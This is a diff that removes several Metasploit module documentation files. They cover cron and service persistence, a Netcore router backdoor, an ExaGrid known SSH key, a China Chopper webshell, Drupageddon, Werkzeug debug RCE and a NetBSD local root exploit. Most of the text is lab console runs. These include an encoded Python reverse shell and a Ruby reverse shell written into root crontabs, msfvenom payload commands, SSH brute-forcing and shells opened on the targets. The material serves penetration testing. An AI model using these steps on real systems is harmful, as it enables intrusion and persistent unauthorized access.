-    [+] Writing * * * * * root python -c "exec('aW1wb3J0IHNvY2tldCAgICwgICAgICAgc3VicHJvY2VzcyAgICwgICAgICAgb3MgICAgICAgOyAgICAgaG9zdD0iMTkyLjE2OC4xOTkuMTI4IiAgICAgICA7ICAgICBwb3J0PTQ0NDQgICAgICAgOyAgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICAgLCAgICAgICBzb2NrZXQuU09DS19TVFJFQU0pICAgICAgIDsgICAgIHMuY29ubmVjdCgoaG9zdCAgICwgICAgICAgcG9ydCkpICAgICAgIDsgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICwgICAgICAgMCkgICAgICAgOyAgICAgb3MuZHVwMihzLmZpbGVubygpICAgLCAgICAgICAxKSAgICAgICA7ICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgIDIpICAgICAgIDsgICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))" #SnwfsUhNys to /etc/crontab
-    [*] Waiting 90sec for callback
-    [*] Command shell session 2 opened (192.168.199.128:4444 -> 192.168.199.128:54837) at 2016-06-20 13:24:01 -0400
-
-And since we didn't clean up, if our session dies...
-
-    ^C
-    Abort session 2? [y/N]  y
-    
-    [*] 10.10.60.168 - Command shell session 2 closed.  Reason: User exit
-    msf exploit(cron_persistence) > use exploit/multi/handler 
-    msf exploit(handler) > set payload cmd/unix/reverse_python
-    payload => cmd/unix/reverse_python
-    msf exploit(handler) > set lhost 192.168.199.128
-    lhost => 192.168.199.128
-    msf exploit(handler) > exploit
-    
-    [*] Started reverse handler on 192.168.199.128:4444 
-    [*] Starting the payload handler...
-    [*] Command shell session 3 opened (192.168.199.128:4444 -> 192.168.199.128:54842) at 2016-06-20 13:27:01 -0400
-
-Run our module (User Crontab)
-
-    msf exploit(cron_persistence) > set payload cmd/unix/reverse_ruby
-    payload => cmd/unix/reverse_ruby
-    msf exploit(cron_persistence) > set lhost 192.168.199.128
-    lhost => 192.168.199.128
-    msf exploit(cron_persistence) > set session 1
-    session => 1
-    msf exploit(cron_persistence) > set verbose true
-    verbose => true
-    msf exploit(cron_persistence) > set target 1
-    target => 1
-    msf exploit(cron_persistence) > exploit
-    
-    [*] Started reverse handler on 192.168.199.128:4444 
-    [*] Max line length is 65537
-    [*] Writing 1247 bytes in 1 chunks of 4566 bytes (octal-encoded), using printf
-    [+] Writing * * * * * ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.199.128","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' #IiWAtaIrHs to /var/spool/cron/crontabs/root
-    [*] Reloading cron to pickup new entry
-    [*] Waiting 90sec for callback
-    [*] Command shell session 2 opened (192.168.199.128:4444 -> 192.168.199.128:55031) at 2016-06-20 14:22:01 -0400
@@ -1,254 +0,0 @@
-### Creating A Testing Environment
-
-  This module has been tested against:
-
-1. Kali 2.0 (System V)
-2. Ubuntu 14.04 (Upstart)
-3. Ubuntu 16.04 (systemd)
-4. Centos 5 (System V)
-5. Fedora 18 (systemd)
-6. Fedora 20 (systemd)
-
-## Verification Steps
-
-  1. Start msfconsole
-  2. Exploit a box via whatever method
-  3. Do: `use exploit/linux/local/service_persistence`
-  4. Do: `set session #`
-  5. Do: `set verbose true`
-  6. Do: `set payload cmd/unix/reverse_python` or `payload cmd/unix/reverse_netcat` depending on system.
-  7. Optional Do: `set SHELLAPTH /bin` if needed for compatibility on remote system.
-  8. Do: `set lhost`
-  9. Do: `exploit`
-  10. Do: `use exploit/multi/handler`
-  11. Do: `set payload cmd/unix/reverse_python` or `payload cmd/unix/reverse_netcat` depending on system.
-  12. Do: `set lhost`
-  13. Do: `exploit -j`
-  14. Kill your shell (if System V, reboot target).  Upstart/systemd wait 10sec
-  15. Get Shell
-
-## Options
-
-**target**
-
-  There are several targets selectable, which all have their own issues.
-
-0. Automatic: Detect the service handler automatically based on running `which` to find the admin binaries
-1. System V: There is no automated restart, so while you'll get a shell, if it crashes, you'll need to wait for a init shift to restart the process automatically (like a reboot).  This logs to syslog or /var/log/<process>.log and .err
-2. Upstart: Logs to its own file.  This module is set to restart the shell after a 10sec pause, and do this forever.
-3. systemd: This module is set to restart the shell after a 10sec pause, and do this forever.
-
-**SHELLPATH**
-  
-  If you need to change the location where the backdoor is written (like on CentOS 5), it can be done here.  Default is /usr/local/bin
-
-**SERVICE**
-
-  The name of the service to create.  If not chosen, a 7 character random one is created.
-
-**SHELL_NAME**
-
-  The name of the file to write with our shell.  If not chosen, a 5 character random one is created.
-
-## Scenarios
-
-### System V (Centos 5 - root - chkconfig)
-
-Get initial access
-
-    msf > use auxiliary/scanner/ssh/ssh_login
-    msf auxiliary(ssh_login) > set rhosts 192.168.199.131
-    rhosts => 192.168.199.131
-    msf auxiliary(ssh_login) > set username root
-    username => root
-    msf auxiliary(ssh_login) > set password centos
-    password => centos
-    msf auxiliary(ssh_login) > exploit
-    
-    [*] 192.168.199.131:22 SSH - Starting bruteforce
-    [+] 192.168.199.131:22 SSH - Success: 'root:centos' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh Linux localhost.localdomain 2.6.18-398.el5 #1 SMP Tue Sep 16 20:51:48 EDT 2014 i686 i686 i386 GNU/Linux '
-    [*] Command shell session 1 opened (192.168.199.128:49359 -> 192.168.199.131:22) at 2016-06-22 14:27:38 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-Install our callback service (system_v w/ chkconfig).  Note we change SHELLPATH since /usr/local/bin isnt in the path for CentOS 5 services.
-
-    msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence
-    msf exploit(service_persistence) > set session 1
-    session => 1
-    msf exploit(service_persistence) > set verbose true
-    verbose => true
-    msf exploit(service_persistence) > set SHELLPATH /bin
-    SHELLPATH => /bin
-    msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat
-    payload => cmd/unix/reverse_netcat
-    msf exploit(service_persistence) > set lhost 192.168.199.128
-    lhost => 192.168.199.128
-    msf exploit(service_persistence) > exploit
-    
-    [*] Started reverse handler on 192.168.199.128:4444 
-    [*] Writing backdoor to /bin/GUIJc
-    [*] Max line length is 65537
-    [*] Writing 95 bytes in 1 chunks of 329 bytes (octal-encoded), using printf
-    [*] Utilizing System_V
-    [*] Utilizing chkconfig
-    [*] Writing service: /etc/init.d/HqdezBF
-    [*] Max line length is 65537
-    [*] Writing 1825 bytes in 1 chunks of 6409 bytes (octal-encoded), using printf
-    [*] Enabling & starting our service
-    [*] Command shell session 2 opened (192.168.199.128:4444 -> 192.168.199.131:56182) at 2016-06-22 14:27:50 -0400
-
-Reboot the box to prove persistence
-
-    reboot
-    ^Z
-    Background session 2? [y/N]  y
-    msf exploit(service_persistence) > use exploit/multi/handler
-    msf exploit(handler) > set payload cmd/unix/reverse_netcat
-    payload => cmd/unix/reverse_netcat
-    msf exploit(handler) > set lhost 192.168.199.128
-    lhost => 192.168.199.128
-    msf exploit(handler) > exploit
-    
-    [*] Started reverse handler on 192.168.199.128:4444 
-    [*] Starting the payload handler...
-    [*] Command shell session 3 opened (192.168.199.128:4444 -> 192.168.199.131:44744) at 2016-06-22 14:29:32 -0400
-
-
-### Upstart (Ubuntu 14.04.4 Server - root)
-Of note, I allowed Root login via SSH w/ password only to gain easy initial access
-
-Get initial access
-
-    msf auxiliary(ssh_login) > exploit
-    
-    [*] 10.10.60.175:22 SSH - Starting bruteforce
-    [+] 10.10.60.175:22 SSH - Success: 'root:ubuntu' 'uid=0(root) gid=0(root) groups=0(root) Linux ubuntu 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:27 UTC 2016 i686 i686 i686 GNU/Linux '
-    [*] Command shell session 1 opened (10.10.60.168:43945 -> 10.10.60.175:22) at 2016-06-22 08:03:15 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-Install our callback service (Upstart)
-
-    msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence
-    msf exploit(service_persistence) > set session 1
-    session => 1
-    msf exploit(service_persistence) > set verbose true
-    verbose => true
-    msf exploit(service_persistence) > set payload cmd/unix/reverse_python
-    payload => cmd/unix/reverse_python
-    msf exploit(service_persistence) > set lhost 10.10.60.168
-    lhost => 10.10.60.168
-    msf exploit(service_persistence) > exploit
-    
-    [*] Started reverse handler on 10.10.60.168:4444 
-    [*] Writing backdoor to /usr/local/bin/bmmjv
-    [*] Max line length is 65537
-    [*] Writing 429 bytes in 1 chunks of 1650 bytes (octal-encoded), using printf
-    [*] Utilizing Upstart
-    [*] Writing /etc/init/Hipnufl.conf
-    [*] Max line length is 65537
-    [*] Writing 236 bytes in 1 chunks of 874 bytes (octal-encoded), using printf
-    [*] Starting service
-    [*] Dont forget to clean logs: /var/log/upstart/Hipnufl.log
-    [*] Command shell session 5 opened (10.10.60.168:4444 -> 10.10.60.175:44368) at 2016-06-22 08:23:46 -0400
-
-And now, we can kill the callback shell from our previous session
-
-    ^Z
-    Background session 5? [y/N]  y
-    msf exploit(service_persistence) > sessions -i 1
-    [*] Starting interaction with 1...
-    
-    netstat -antp | grep 4444
-    tcp        0      0 10.10.60.175:44368      10.10.60.168:4444       ESTABLISHED 1783/bash
-    tcp        0      0 10.10.60.175:44370      10.10.60.168:4444       ESTABLISHED 1789/python
-    kill 1783
-    [*] 10.10.60.175 - Command shell session 5 closed.  Reason: Died from EOFError
-    kill 1789
-
-Now with a multi handler, we can catch Upstart restarting the process every 10sec
-
-    msf > use exploit/multi/handler 
-    msf exploit(handler) > set payload cmd/unix/reverse_python
-    payload => cmd/unix/reverse_python
-    msf exploit(handler) > set lhost 10.10.60.168
-    lhost => 10.10.60.168
-    msf exploit(handler) > exploit
-    
-    [*] Started reverse handler on 10.10.60.168:4444 
-    [*] Starting the payload handler...
-    [*] Command shell session 3 opened (10.10.60.168:4444 -> 10.10.60.175:44390) at 2016-06-22 08:26:48 -0400
-
-
-### systemd (Ubuntu 16.04 Server - root)
-Ubuntu 16.04 doesn't have many of the default shell options, however `cmd/unix/reverse_netcat` works.
-While python shellcode works on previous sytems, on 16.04 the path is `python3`, and therefore `python` will fail the shellcode.
-
-Get initial access
-
-    msf exploit(handler) > use exploit/linux/local/service_persistence
-    msf exploit(service_persistence) > set session 1
-    session => 1
-    msf exploit(service_persistence) > set verbose true
-    verbose => true
-    msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat
-    payload => cmd/unix/reverse_netcat
-    msf exploit(service_persistence) > set lhost 192.168.199.128
-    lhost => 192.168.199.128
-    msf exploit(service_persistence) > exploit
-    
-    [*] Started reverse handler on 192.168.199.128:4444 
-    [*] Writing backdoor to /usr/local/bin/JSRCF
-    [*] Max line length is 65537
-    [*] Writing 103 bytes in 1 chunks of 361 bytes (octal-encoded), using printf
-    [*] Utilizing systemd
-    [*] /lib/systemd/system/YelHpCx.service
-    [*] Max line length is 65537
-    [*] Writing 151 bytes in 1 chunks of 579 bytes (octal-encoded), using printf
-    [*] Enabling service
-    [*] Starting service
-    [*] Command shell session 7 opened (192.168.199.128:4444 -> 192.168.199.130:47050) at 2016-06-22 10:35:07 -0400
-    
-    ^Z
-    Background session 7? [y/N]  y
-
-Kill the process on the Ubuntu target box via local access #good_admin
-
-    root@ubuntu:/etc/systemd/system/multi-user.target.wants# netstat -antp | grep 4444
-    tcp        0      0 192.168.199.130:47052   192.168.199.128:4444    ESTABLISHED 5632/nc
-    root@ubuntu:/etc/systemd/system/multi-user.target.wants# kill 5632
-
-And logically, we lose our shell
-
-     [*] 192.168.199.130 - Command shell session 7 closed.  Reason: Died from EOFError
-
-Now with a multi handler, we can catch systemd restarting the process every 10sec
-
-
-    msf exploit(service_persistence) > use exploit/multi/handler 
-    msf exploit(handler) > show options
-
-    Module options (exploit/multi/handler):
-
-     Name  Current Setting  Required  Description
-     ----  ---------------  --------  -----------
-    
-    Payload options (cmd/unix/reverse_netcat):
-
-     Name   Current Setting  Required  Description
-     ----   ---------------  --------  -----------
-     LHOST  192.168.199.128  yes       The listen address
-     LPORT  4444             yes       The listen port
-
-    Exploit target:
-
-     Id  Name
-     --  ----
-     0   Wildcard Target
-
-    msf exploit(handler) > exploit
-
-    [*] Started reverse handler on 192.168.199.128:4444 
-    [*] Starting the payload handler...
-    [*] Command shell session 8 opened (192.168.199.128:4444 -> 192.168.199.130:47056) at 2016-06-22 10:37:30 -0400
@@ -1,94 +0,0 @@
-### Vulnerable Devices
-Trend Micro lists "almost all" models as being vulnerable in August 2014.
-
-Vulnerable AND Exploitable:
-
-1. Netcore NI360 second-generation
- 
-Vulnerable, but not Exploitable via this module (details later):
-
-1. Netis WF2414 firmware V1.4.27001
-
-### Lab Emulation
-1. Install qemu
-2. Download and install mipsel.  Please read the [tutorial](https://people.debian.org/%7Eaurel32/qemu/mipsel/README.txt)
-3. Starts the mipsel lab
- 1. `qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic -net user,hostfwd=tcp::22222-:22,hostfwd=udp::53413-:53413`
-4. Put [vuln_squashfs-root.tar.gz](https://github.com/rapid7/metasploit-framework/files/267284/vuln_squashfs-root.tar.gz) to mipsel lab, extract it.
- 1. `scp -P22222 vuln_squashfs-root.tar.gz root@127.0.0.1:/root`
- 2. `tar xvf vuln_squashfs-root.tar.gz`
-5. Run vuln programs.
- 1. `cd nw614 && chroot . /bin/igdmptd`
-
-## Verification Steps
-
-  1. Install the emulator/hardware
-  2. Start msfconsole
-  3. Do: `use exploits/linux/misc/netcore_udp_53413_backdoor`
-  4. Do: `set RHOST <ip>`
-  5. Do: `check`
-  6. Do: `exploit`
-  7. You should get a shell.
-
-## Exploitability
-
-As previously noted, some modules are vulnerable, but not currently exploitable via Metasploit.
-During [testing](https://github.com/rapid7/metasploit-framework/pull/6880#issuecomment-231597626) it was discovered that some modules implement an echo command that does not honor -ne.  While it may be possible to still execute a shell, further investigation would need to be conducted.
-In these cases, it should be possible to use [other scripts](https://github.com/h00die/MSF-Testing-Scripts/blob/master/netis_backdoor.py) to act as a fake interactive shell.
-
-## Scenarios
-
-The following is an example of a vulnerable AND EXPLOITABLE router.
-
-```
-use exploits/linux/misc/netcore_udp_53413_backdoor
-msf exploit(netcore_udp_53413_backdoor) > set RHOST 192.168.1.1
-RHOST => 192.168.1.1
-msf exploit(netcore_udp_53413_backdoor) > check
-[+] The target is vulnerable.
-msf exploit(netcore_udp_53413_backdoor) > run
-
-[*] Started reverse TCP handler on 192.168.1.2:4444
-[*] Exploiting...
-[*] Command Stager progress -  12.54% done (196/1563 bytes)
-[*] Command Stager progress -  25.08% done (392/1563 bytes)
-[*] Command Stager progress -  37.62% done (588/1563 bytes)
-[*] Command Stager progress -  50.16% done (784/1563 bytes)
-[*] Command Stager progress -  62.70% done (980/1563 bytes)
-[*] Command Stager progress -  75.24% done (1176/1563 bytes)
-[*] Command Stager progress -  87.78% done (1372/1563 bytes)
-[*] Command Stager progress - 100.00% done (1563/1563 bytes)
-[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:54180) at 2016-05-16 00:52:43 -0500
-
-pwd
-/
-ls
-bin
-cfg
-dev
-etc
-lib
-linuxrc
-log
-proc
-sbin
-sh
-sys
-tmp
-usr
-var
-web
-```
-
-The following is an example of a vulnerable but NOT expoitable router.
-
-```
-msf > use exploits/linux/misc/netcore_udp_53413_backdoor
-msf exploit(netcore_udp_53413_backdoor) > set rhost 192.168.1.1
-rhost => 192.168.1.1
-msf exploit(netcore_udp_53413_backdoor) > check
-
-[+] Backdoor Unlocked
-[*] Router backdoor triggered, but non-exploitable echo command detected.  Not currently exploitable with Metasploit.
-[*] The target service is running, but could not be validated.
-```
@@ -1,27 +0,0 @@
-## Vulnerable Application
-
-  ExaGrid devices having a firmware before version 4.8 P26 contain a known ssh private key, and root password
-
-## Verification Steps
-
-  1. Start msfconsole
-  2. Do: `use exploit/linux/ssh/exagrid_known_privkey`
-  3. Do: `set rhost <ip>`
-  4. Do: `exploit`
-  5. You should get a shell.
-
-## Scenarios
-
-This is a run against a known vulnerable ExaGrid device.
-```
-msf > use exploit/linux/ssh/exagrid_known_privkey
-msf exploit(exagrid_known_privkey) > set rhost 1.2.3.4
-rhost => 1.2.3.4
-msf exploit(exagrid_known_privkey) > run
-
-[+] Successful login
-[*] Command shell session 3 opened (140.172.223.184:39269 -> 1.2.3.4:22) at 2016-07-23 10:03:19 -0400
-
-ExaGrid diagnostic tools are available in this shell.
-02:05:49 up 12 days, 9:12, 0 users, load average: 3.32, 2.88, 9.21
-```
@@ -1,44 +0,0 @@
-China Chopper Caidao PHP Backdoor or simply [Chinese Caidao](https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html) is a webshell manager coded in PHP.
-
-## Vulnerable Application
-
-Here is the [PHP code](https://github.com/rapid7/metasploit-framework/files/430643/caidao.zip) of the backdoor that you can use and save it as caidao.php.
-
-## Verification Steps
-
-  1. Install the application
-  2. Start msfconsole
-  3. Do: `use exploit/multi/http/caidao_php_backdoor_exec`
-  4. Do: `set rport port`
-  5. Do: `set rhost ip`
-  6. Do: `check`
-```
-[+] 192.168.1.103:80 - The target is vulnerable.
-```
-  8. Do: `exploit`
-  9. You should get a shell.
-
-## Options
-
-  **TARGETURI**
-
-  TARGETURI by default is `/caidao.php`, which is the common filename of the backdoor.
-  
-  **PASSWORD**
-  
-  PASSWORD by default is `chopper`, which is the password of the backdoor.
-
-## Demonstration
-
-```
-msf exploit(caidao_php_backdoor_exec) > exploit
-
-[*] Started reverse handler on 192.168.1.108:4444 
-[*] Sending stage (33068 bytes) to 192.168.1.103
-[*] Meterpreter session 2 opened (192.168.1.108:4444 -> 192.168.1.103:42349) at 2015-11-02 09:05:54 +0000
-
-meterpreter > sysinfo 
-Computer    : kali
-OS          : Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686
-Meterpreter : php/php
-```
@@ -1,57 +0,0 @@
-## Vulnerable Application
-
-  Drupal 7.31 official [download](https://ftp.drupal.org/files/projects/drupal-7.31.tar.gz)
-
-## Verification Steps
-
-  1. Install the application
-  2. Start msfconsole
-  3. Do: `use exploit/multi/http/drupal_drupageddon`
-  4. Do: `set rhost <ip>`
-  5. Do: `run`
-  6. You should get a shell.
-
-## Scenarios
-
-  This is a run against a Drupal 7.31 linux box.
-
-  ```
-msf > use exploit/multi/http/drupal_drupageddon
-msf exploit(drupal_drupageddon)
-msf exploit(drupal_drupageddon) > set rhost 1.1.1.1
-rhost => 1.1.1.1
-msf exploit(drupal_drupageddon) > set verbose true
-verbose => true
-msf exploit(drupal_drupageddon) > exploit
-
-[*] Started reverse TCP handler on 2.2.2.2:4444
-[*] Testing page
-[*] form_build_id: form-a1VaaaEaa0lUvL79wIAfdQEaaJRw8P7a1aWGXElI_Go
-[*] form_token:
-[*] password hash: $P\$8zAAApjTciVA2qz7HdAA0UjAAwUft00
-[*] Creating new user AaCaUlLaPR:AAgeAAAAjA
-[*] Logging in as AaCaUlLaPR:AAgeAAAAjA
-[*] cookie: SESS911797186fac11111d08b1111a15db55=aaSfinhC0AAAAbzhAoO3bBaaOerRrvpn3cL0rA77Dhg;
-[*] Trying to parse enabled modules
-[*] form_build_id: form-YZljDkG8n5AAaAaAaaaYGLaP8MIfdif5VfwjQMMxdN0
-[*] form_token: Bj92oAaAaWRwqyAAAySWQpeUI03aA9wfkAozXsk_t_E
-[*] Enabling the PHP filter module
-[*] Setting permissions for PHP filter module
-[*] form_build_id: form-1Z1pAg11amM-1jHALgm1AAAAA1JdwAAA1qXnSTZahPA
-[*] form_token: kAA1A1AfqK_PvJQi1AAAAAAAAxyGyLvHemBor1q11Z1
-[*] admin role id: 3
-[*] Getting tokens from create new article page
-[*] form_build_id: form-_-leQaaaAAeBXbAaAAaaAAx1IrYSI1qeA2OGf2Ce1vs
-[*] form_token: Ib1y8aAaaAAAdapA53kUcfWf7msTRHiDUb_CIKzAAAA
-[*] Calling preview page. Exploit should trigger...
-[*] Sending stage (33721 bytes) to 1.1.1.1
-[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:45388) at 2016-08-25 11:30:41 -0400
-
-meterpreter > sysinfo
-Computer : drupal
-OS : Linux drupal 2.6.32-642.3.1.el6.x86_64 #1 SMP Sun Jun 26 18:16:44 EDT 2016 x86_64
-Meterpreter : php/linux
-
-meterpreter > getuid
-Server username: apache (48)
-  ```
@@ -1,72 +0,0 @@
-## Vulnerable Application
-
-Verified against:
-  + 0.9.6 on Debian
-  + 0.9.6 on Centos
-  + 0.10 on Debian
-  
-A sample application which enables the console debugger is available [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/werkzeug_console.py)
-
-## Verification Steps
-
-  1. Install the application
-  2. Start msfconsole
-  3. Do: `use exploit/multi/http/werkzeug_debug_rce`
-  4. Do: `set rport <port>`
-  5. Do: `set rhost <ip>`
-  6. Do: `check`
-```
-[+] 10.108.106.201:8081 - The target is vulnerable.
-```
-  7. Do: `set payload python/meterpreter/reverse_tcp`
-  8. Do: `set lhost <ip>`
-  9. Do: `exploit`
-  10. You should get a shell.
-
-## Options
-
-  **TARGETURI**
-
-  TARGETURI by default is `/console`, as defined by werkzeug, however it can be changed within the python script.
-
-## Scenarios
-
-Example utilizing the previously mentioned sample app listed above.
-
-```
-msf > use exploit/multi/http/werkzeug_debug_rce
-msf exploit(werkzeug_debug_rce) > set rport 8081
-rport => 8081
-msf exploit(werkzeug_debug_rce) > set rhost 10.108.106.201
-rhost => 10.108.106.201
-msf exploit(werkzeug_debug_rce) > check
-[+] 10.108.106.201:8081 - The target is vulnerable.
-msf exploit(werkzeug_debug_rce) > set payload python/meterpreter/reverse_tcp
-payload => python/meterpreter/reverse_tcp
-msf exploit(werkzeug_debug_rce) > set lhost 10.108.106.121
-lhost => 10.108.106.121
-msf exploit(werkzeug_debug_rce) > exploit
-
-[*] Started reverse handler on 10.108.106.121:4444
-[*] Sending stage (25277 bytes) to 10.108.106.201
-[*] Meterpreter session 2 opened (10.108.106.121:4444 -> 10.108.106.201:36720) at 2015-07-09 19:02:52 -0400
-
-meterpreter > getpid
-Current pid: 13034
-meterpreter > getuid
-Server username: root
-meterpreter > sysinfo
-Computer     : werkzeug
-OS           : Linux 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt11-1 (2015-05-24)
-Architecture : x86_64
-Meterpreter  : python/python
-meterpreter > shell
-Process 13037 created.
-Channel 0 created.
-/bin/sh: 0: can't access tty; job control turned off
-# ls
-app.py  app.pyc  werkzeug
-# exit
-meterpreter > exit
-[*] Shutting down Meterpreter...
-```
@@ -1,203 +0,0 @@
-## Vulnerable Application
-
-  NetBSD 7.0.1 is available from the [official](http://cdn.netbsd.org/pub/NetBSD/NetBSD-7.0.1/images/NetBSD-7.0.1-amd64.iso) site, or on an [unofficial git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/NetBSD-7.0.1-amd64.iso) 
-
-## Issues
-Getting an initial shell that can write files correctly was difficult.  The best I found was reverse_openssl.
-
-Payloads that didn't work:
-* cmd/unix/reverse - connected back, but couldn't write file.
-```
-[*] Started reverse TCP double handler on 172.16.152.1:4444 
-[*] Writing Payload to /tmp/zrWqhXpL
-[*] Max line length is 131073
-[*] /usr/bin/printf '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
-[*] printf '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
-[*] /usr/bin/printf %b '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
-[*] printf %b '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "\xFF\xF4\xFF\xFD\x06\xFF\xFF\xFEABCD\x7F%%\r\x00\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
-[*] perl -e 'print("\0\377\376\101\102\103\104\177\45\45\15\12")' Failed: "perl: not found\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
-[*] gawk 'BEGIN {ORS="";print "\x00\xff\xfe\x41\x42\x43\x44\x7f\x25\x25\x0d\x0a"}' </dev/null Failed: "gawk: not found\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
-[*] echo '00fffe414243447f25250d0a'|xxd -p -r Failed: "xxd: not found\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
-[*] echo -ne '\x00\xff\xfe\x41\x42\x43\x44\x7f\x25\x25\x0d\x0a' Failed: "-ne \\x00\\xff\\xfe\\x41\\x42\\x43\\x44\\x7f\\x25\\x25\\x0d\\x0a\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
-[-] Exploit failed: RuntimeError Can't find command on the victim for writing binary data
-[*] Exploit completed, but no session was created.
-```
-* cmd/unix/reverse_awk - `awk: syntax error at source line 1`
-* cmd/unix/reverse_bash - `./bsd.payload: 1: Syntax error: Bad fd number`
-* cmd/unix/reverse_bash_telnet_ssl - `$ telnet: unknown option -- z`
-* cmd/unix/reverse_ssl_double_telnet - `$ telnet: unknown option -- z`
-* cmd/unix/reverse_lua - `lua: (command line):1: module 'socket' not found`
-* netcat, node, perl, php, python, php, ruby, zsh - all not installed by default
-* bsd/* didn't seem to work either, maybe its for freebsd?
-
-Payloads that did work:
-* cmd/unix/reverse_openssl
-
-## Verification Steps
-
-  1. Start msfconsole
-  2. Get an initial shell
-    1. Create working shell, scp it over
-```
-./msfvenom -p cmd/unix/reverse_openssl lhost=172.16.152.1 -f raw -o /tmp/bsd.payload
-scp /tmp/bsd.payload user@172.16.152.128:/tmp/
-```
-    2. Setup msf to handle
-```
-use exploit/multi/handler
-set payload cmd/unix/reverse_openssl
-set lhost 172.16.152.1
-exploit
-```
-    3. Run the shell from NetBSD
-```
-$ cd /tmp
-$ ls
-bsd.payload
-$ chmod +x bsd.payload 
-$ ./bsd.payload 
-$ WARNING: can't open config file: /etc/openssl/openssl.cnf
-depth=0 CN = vgekg
-verify error:num=18:self signed certificate
-verify return:1
-depth=0 CN = vgekg
-verify return:1
-```
-    4. Receive the shell and background it
-```
-[*] Started reverse double SSL handler on 172.16.152.1:4444 
-[*] Starting the payload handler...
-[*] Accepted the first client connection...
-[*] Accepted the second client connection...
-[*] Command: echo NwNHAEiJioYIvn4M;
-[*] Writing to socket A
-[*] Writing to socket B
-[*] Reading from sockets...
-[*] Reading from socket A
-[*] A: "NwNHAEiJioYIvn4M\n"
-[*] Matching...
-[*] B is input...
-[*] Command shell session 1 opened (172.16.152.1:4444 -> 172.16.152.128:65534) at 2016-08-25 19:58:39 -0400
-^Z
-Background session 1? [y/N]  y
-```
-  3. Do: `use exploit/unix/local/netbsd_mail_local`
-  4. Do: `set payload cmd/unix/reverse_openssl`
-  5. Do: `set lhost 172.16.152.1`
-  6. Do: `set verbose true`
-  7. Do: `set session 1`
-  8. Do: `exploit`
-  9. You should get a *root* shell.
-
-## Options
-
-  **ATRUNPATH**
-  File location of atrun, defaults to `/usr/libexec/atrun`
-  
-  **MAILDIR**
-  Location of mail folder, defaults to `/var/mail`
-  
-  **WritableDir**
-  Location of a writable directory for our payload, defaults to `/tmp`
-  
-  **ListenerTimeout**
-  Since this exploit utilized a cron which has a 10min timer, the listener timeout needs to be 10min + padding.  Defaults to `603` seconds (10min, 3sec)
-
-## Scenarios
-
-  Here is a run against a virgin install of `NetBSD  7.0.1 NetBSD 7.0.1 (GENERIC.201605221355Z) amd64` (from the unofficial link at the top)
-  
-  In this example, I got lucky and only had to wait ~1min for the cron to hit, which is every 10min by default
-
-  1. Get an initial shell
-    1. Create working shell, scp it over
-```
-./msfvenom -p cmd/unix/reverse_openssl lhost=172.16.152.1 -f raw -o /tmp/bsd.payload
-scp /tmp/bsd.payload user@172.16.152.128:/tmp/
-```
-    2. Setup msf to handle
-```
-use exploit/multi/handler
-set payload cmd/unix/reverse_openssl
-set lhost 172.16.152.1
-exploit
-```
-    3. Run the shell from NetBSD
-```
-$ cd /tmp
-$ ls
-bsd.payload
-$ chmod +x bsd.payload 
-$ ./bsd.payload 
-$ WARNING: can't open config file: /etc/openssl/openssl.cnf
-depth=0 CN = vgekg
-verify error:num=18:self signed certificate
-verify return:1
-depth=0 CN = vgekg
-verify return:1
-```
-    4. Receive the shell and background it
-```
-[*] Started reverse double SSL handler on 172.16.152.1:4444 
-[*] Starting the payload handler...
-[*] Accepted the first client connection...
-[*] Accepted the second client connection...
-[*] Command: echo NwNHAEiJioYIvn4M;
-[*] Writing to socket A
-[*] Writing to socket B
-[*] Reading from sockets...
-[*] Reading from socket A
-[*] A: "NwNHAEiJioYIvn4M\n"
-[*] Matching...
-[*] B is input...
-[*] Command shell session 1 opened (172.16.152.1:4444 -> 172.16.152.128:65534) at 2016-08-25 19:58:39 -0400
-^Z
-Background session 1? [y/N]  y
-```
-  2. Run the exploit
-```
-msf exploit(netbsd_mail_local) > set payload cmd/unix/reverse_openssl
-payload => cmd/unix/reverse_openssl
-msf exploit(netbsd_mail_local) > set lhost 172.16.152.1
-lhost => 172.16.152.1
